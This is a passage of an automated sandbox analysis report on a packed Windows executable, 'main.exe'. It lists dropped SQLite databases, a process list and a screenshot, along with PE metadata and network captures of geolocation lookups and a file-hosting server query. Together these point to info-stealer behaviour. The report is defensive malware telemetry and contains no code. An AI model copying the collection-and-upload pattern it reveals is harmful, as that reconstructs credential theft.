                                                                                                                                                                                                                                                                              SSDEEP:24:2rTHwoh9wIwpjRmZDKJCwpjRSpDKJCrTV8woPpSwpjRVpbCwpjOSbpbb:SDTwIYVcDKJCYVuDKJCrSPpSYVVpbCYb
                                                                                                                                                                                                                                                                              MD5:6A260B07BAB16CDD661E99BA9E0518F6
                                                                                                                                                                                                                                                                              SHA1:13AB556855EADC64A8FC060B09C192AE2EFA2C23
                                                                                                                                                                                                                                                                              SHA-256:8014E4C7A0E9C2751F23C198AAFC5350334E087F4F56489BCEBD63EF540AB0CF
                                                                                                                                                                                                                                                                              SHA-512:FC5D394BC100D7EB1EF657BFB82F6A67A8A21EB42C2B6B50D4733AFB96DD35C46DE98A7B5055F5D1420EDE794A8190A3A63BDF3D023CBF935E8C68A68BD508EF
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:https://go.microsoft.com/fwlink/?linkid=851546..https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016..https://support.microsoft.com/en-us/office/7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us..https://support.microsoft.com/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us..https://go.microsoft.com/fwlink/?LinkId=2106243..https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17..https://support.microsoft.com/en-us/office/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17?ui=en-us&rs=en-us&ad=us..https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d8e17?ui=en-us&rs=en-us&ad=us..
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):16538
                                                                                                                                                                                                                                                                              Entropy (8bit):3.2228893359206277
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:384:V7DbhcMGuFNZOOYeIEYAZDKaTwJx8+uyUnVjFjcycLXEbWJhUcpEVQeVRVQNNYg1:JDlcTuFNZOOYeIEYAZDKaTwz8+uyUnVc
                                                                                                                                                                                                                                                                              MD5:F5FAF197558C69C0CFEC5F930FAF44AE
                                                                                                                                                                                                                                                                              SHA1:277FF73BD187D72DA68851F30AE6CA02DC18A1AC
                                                                                                                                                                                                                                                                              SHA-256:79EDD0B5D41C69CD89BD8A8B3029D73BB822092128F65BB15AA259A5B85A2F3F
                                                                                                                                                                                                                                                                              SHA-512:CCF9D6CA5C6F71AEBF7FDAB1343AAA06A7CF1E8058FB5D8066FC2187E1F26C01B78788A1A00297DD5DA7F4A6C3B39072020E2FA7BB42BE695216FA1F4C6C940D
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:..Image Name PID Session Name Session# Mem Usage..========================= ======== ================ =========== ============..System Idle Process 0 Services 0 8 K..System 4 Services 0 176 K..Registry 92 Services 0 79'468 K..smss.exe 324 Services 0 1'236 K..csrss.exe 408 Services 0 5'312 K..wininit.exe 484 Services 0 7'256 K..csrss.exe 492 Console 1 6'072 K..winlogon.exe 552 Console 1 16'700 K..services.exe 620 Services 0 12'208 K..lsass.exe 628 Services 0 19'908 K..svchost.exe 752 Services
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PNG image data, 1280 x 1024, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):360604
                                                                                                                                                                                                                                                                              Entropy (8bit):7.992758165143328
                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                              SSDEEP:6144:AAkAtanHdaPoRX4i51Y6kgFuc4NULjDmHfpGmHNeok3yfveocRZcCDnzMqmE:ABEo9aP0X4U1cRc9Yfp2qmocTcCAI
                                                                                                                                                                                                                                                                              MD5:DA53DEB000B4D8308DC246C61DC9B53F
                                                                                                                                                                                                                                                                              SHA1:A808A3CD3D138B384D7C3EBF4B6B814538503BC0
                                                                                                                                                                                                                                                                              SHA-256:1A08580C81A7B15903E0CD0CC27E8E1D6E67601676BE36E464DAC6D6BD9DE4FE
                                                                                                                                                                                                                                                                              SHA-512:816B18DC3B0AA06DD00B25703AA3F12071BC7EB6CBEDF157D452EA880F4F9258D0C8B3DDC0E0A15FC45AE80287BC49D22B113581ED5B3E593CF34B77B198D701
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):159744
                                                                                                                                                                                                                                                                              Entropy (8bit):0.7873599747470391
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                                                                                                                              MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                                                                                                                              SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                                                                                                                              SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                                                                                                                              SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):114688
                                                                                                                                                                                                                                                                              Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):28672
                                                                                                                                                                                                                                                                              Entropy (8bit):2.5793180405395284
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                                                                                                                              MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                                                                                                                              SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                                                                                                                              SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                                                                                                                              SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):40960
                                                                                                                                                                                                                                                                              Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):114688
                                                                                                                                                                                                                                                                              Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):49152
                                                                                                                                                                                                                                                                              Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                                                                              MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                                                                              SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                                                                              SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                                                                              SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):106496
                                                                                                                                                                                                                                                                              Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):78
                                                                                                                                                                                                                                                                              Entropy (8bit):4.748050898372057
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:ElBFReNmI4S2UUAuF5QEyn:EhMmI4S2UP3
                                                                                                                                                                                                                                                                              MD5:8D2E7126FD48AF00762BB44BADC4CC90
                                                                                                                                                                                                                                                                              SHA1:8A370983DCD5D7D22C364B8C3D5AF038F04DE0D9
                                                                                                                                                                                                                                                                              SHA-256:07BA02BC0A103951D9B8898F73A7A7282E70D9D967FCF97F7F9BB3A8E9B86973
                                                                                                                                                                                                                                                                              SHA-512:2049919AAB10F14A7D6E8C793904DA116A713F0FFAE808BEC1BDAB2F1D2370D81E8F9084AF00C3E8BFCE000AECDB91C02C06B4950819E5167221B46B8F79DF5F
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:[PYI-7680:ERROR] Failed to execute script 'main' due to unhandled exception!..
                                                                                                                                                                                                                                                                              File type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Entropy (8bit):7.996969631369594
                                                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                                                              • Win64 Executable Console (202006/5) 92.65%
                                                                                                                                                                                                                                                                              • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                              File name:main.exe
                                                                                                                                                                                                                                                                              File size:27'577'634 bytes
                                                                                                                                                                                                                                                                              MD5:c0e4c8f676e781c9dd3d57ffa4f99111
                                                                                                                                                                                                                                                                              SHA1:94a6f60949f38da538b5227722698dd880961bb2
                                                                                                                                                                                                                                                                              SHA256:9c08a9aca45b1a4e36e0dc907eebead439bff5b2048b1f2248afa4f88520812d
                                                                                                                                                                                                                                                                              SHA512:c72e37577c7c1b87404c437431db1a8e72fdb44d402d054556d7d7fb054f5504ae1302a9e7cd20621b84f9b9cc90196ea4a04668a5c8e254cb2d2ca5fae35a69
                                                                                                                                                                                                                                                                              SSDEEP:786432:59Yi93OVl8ZFrwq3ObRq2Gm1QtI+1zYCuA188yytDg/K+m5p:59zJB3CRpGiiI+fZXyytD5l
                                                                                                                                                                                                                                                                              TLSH:13573366D27108A6EAF5523E832BC25DFA10ED159BA8D54A93E00E076F5B2D0CD3CF47
                                                                                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......xh.B<...<...<...wq..;...wq......wq..6...,.W.>...,...5...,...-...,.......wq..;...<.......w...%...w...=...Rich<...........PE..d..
                                                                                                                                                                                                                                                                              Icon Hash:2e1e7c4c4c61e979
                                                                                                                                                                                                                                                                              Entrypoint:0x14000c380
                                                                                                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                                                              Subsystem:windows cui
                                                                                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                              Time Stamp:0x67672483 [Sat Dec 21 20:26:43 2024 UTC]
                                                                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                                                                              OS Version Major:6
                                                                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                                                                              File Version Major:6
                                                                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                                                                              Subsystem Version Major:6
                                                                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                                                                              Import Hash:a06f302f71edd380da3d5bf4a6d94ebd
                                                                                                                                                                                                                                                                              Instruction
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3e9ec | 0x50 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x49000 | 0xef8c | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x46000 | 0x22bc | .pdata |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x58000 | 0x768 | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3bfb0 | 0x1c | .rdata |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x3be70 | 0x140 | .rdata |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x2d000 | 0x400 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x2b170 | 0x2b200 | 420661550c659f884db561712e500aae | False | 0.5455615942028985 | data | 6.498595774489571 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x2d000 | 0x12802 | 0x12a00 | b8a8224d719ff42417f9651a57587042 | False | 0.5229262793624161 | data | 5.768424648089835 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0x40000 | 0x5408 | 0xe00 | aff56347f897785154c53727472c548d | False | 0.13504464285714285 | data | 1.8315705466577277 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .pdata | 0x46000 | 0x22bc | 0x2400 | 2411a276649fc67a0a93227155911735 | False | 0.4740668402777778 | data | 5.334571311334213 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .rsrc | 0x49000 | 0xef8c | 0xf000 | 5d72e0338b034862f777c781ab7d2219 | False | 0.8010091145833333 | data | 7.3501462320035476 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x58000 | 0x768 | 0x800 | 42d6242177dbae8e11ed5d64b87d0d48 | False | 0.5576171875 | data | 5.268722219019965 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0x49208 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.56636460554371 |
| RT_ICON | 0x4a0b0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.7287906137184116 |
| RT_ICON | 0x4a958 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.7471098265895953 |
| RT_ICON | 0x4aec0 | 0x909b | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9971636186822983 |
| RT_ICON | 0x53f5c | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | | | 0.38309128630705397 |
| RT_ICON | 0x56504 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | | | 0.4826454033771107 |
| RT_ICON | 0x575ac | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | | | 0.699468085106383 |
| RT_GROUP_ICON | 0x57a14 | 0x68 | data | | | 0.7019230769230769 |
| RT_MANIFEST | 0x57a7c | 0x50d | XML 1.0 document, ASCII text | | | 0.4694508894044857 |

| DLL | Import |
|---|---|
| USER32.dll | TranslateMessage, ShutdownBlockReasonCreate, GetWindowThreadProcessId, SetWindowLongPtrW, GetWindowLongPtrW, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, CreateWindowExW, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, GetMessageW |
| KERNEL32.dll | GetTimeZoneInformation, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCPInfo, GetOEMCP, GetACP, IsValidCodePage, GetStringTypeW, FormatMessageW, GetLastError, GetModuleFileNameW, LoadLibraryExW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, CreateDirectoryW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, HeapSize, RemoveDirectoryW, GetTempPathW, CloseHandle, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, Sleep, GetCurrentProcess, GetCurrentProcessId, TerminateProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LocalFree, SetConsoleCtrlHandler, GetConsoleWindow, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, GetFileAttributesExW, HeapReAlloc, WriteConsoleW, SetEndOfFile, GetDriveTypeW, IsDebuggerPresent, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, GetModuleHandleW, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, GetCommandLineA, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW, GetCurrentDirectoryW, FlushFileBuffers, SetEnvironmentVariableW |
| ADVAPI32.dll | ConvertSidToStringSidW, GetTokenInformation, OpenProcessToken, ConvertStringSecurityDescriptorToSecurityDescriptorW |

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 21, 2024 21:51:39.723114967 CET | 57550 | 53 | 192.168.2.4 | 1.1.1.1
Dec 21, 2024 21:51:39.935451984 CET | 53 | 57550 | 1.1.1.1 | 192.168.2.4
Dec 21, 2024 21:51:43.662744999 CET | 60473 | 53 | 192.168.2.4 | 1.1.1.1
Dec 21, 2024 21:51:43.799485922 CET | 53 | 60473 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 21, 2024 21:51:39.723114967 CET | 192.168.2.4 | 1.1.1.1 | 0xcd19 | Standard query (0) | api.gofile.io | A (IP address) | IN (0x0001) | false
Dec 21, 2024 21:51:43.662744999 CET | 192.168.2.4 | 1.1.1.1 | 0xa906 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 21, 2024 21:51:39.935451984 CET | 1.1.1.1 | 192.168.2.4 | 0xcd19 | No error (0) | api.gofile.io |  | 45.112.123.126 | A (IP address) | IN (0x0001) | false
Dec 21, 2024 21:51:43.799485922 CET | 1.1.1.1 | 192.168.2.4 | 0xa906 | No error (0) | ip-api.com |  | 208.95.112.1 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                                                                              • api.gofile.io
                                                                                                                                                                                                                                                                              • ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49732 | 208.95.112.1 | 80 | 7680 | C:\Users\user\Desktop\main.exe

Timestamp | Bytes transferred | Direction | Data
Dec 21, 2024 21:51:43.920789957 CET | 156 | OUT | GET /json/ HTTP/1.1
Host: ip-api.com
User-Agent: python-requests/2.32.3
Accept-Encoding: gzip, deflate, br, zstd
Accept: */*
Connection: keep-alive
Dec 21, 2024 21:51:45.035140038 CET | 483 | IN | HTTP/1.1 200 OK
Date: Sat, 21 Dec 2024 20:51:44 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 306
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.189"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49733 | 208.95.112.1 | 80 | 7680 | C:\Users\user\Desktop\main.exe

Timestamp | Bytes transferred | Direction | Data
Dec 21, 2024 21:51:45.159126997 CET | 182 | OUT | GET /json/8.46.123.189?fields=192511 HTTP/1.1
Host: ip-api.com
User-Agent: python-requests/2.32.3
Accept-Encoding: gzip, deflate, br, zstd
Accept: */*
Connection: keep-alive
Dec 21, 2024 21:51:49.370474100 CET | 497 | IN | HTTP/1.1 200 OK
Date: Sat, 21 Dec 2024 20:51:48 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 320
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","proxy":false,"query":"8.46.123.189"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 45.112.123.126 | 443 | 7680 | C:\Users\user\Desktop\main.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-21 20:51:41 UTC | 124 | OUT | GET /servers HTTP/1.1
Accept-Encoding: identity
Host: api.gofile.io
User-Agent: Python-urllib/3.11
Connection: close
2024-12-21 20:51:42 UTC | 1116 | IN | HTTP/1.1 200 OK
Server: nginx/1.27.1
Date: Sat, 21 Dec 2024 20:51:41 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 461
Connection: close
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: Content-Type, Authorization
Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEAD
Access-Control-Allow-Credentials: true
Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: cross-origin
Origin-Agent-Cluster: ?1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15552000; includeSubDomains
X-Content-Type-Options: nosniff
X-DNS-Prefetch-Control: off
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
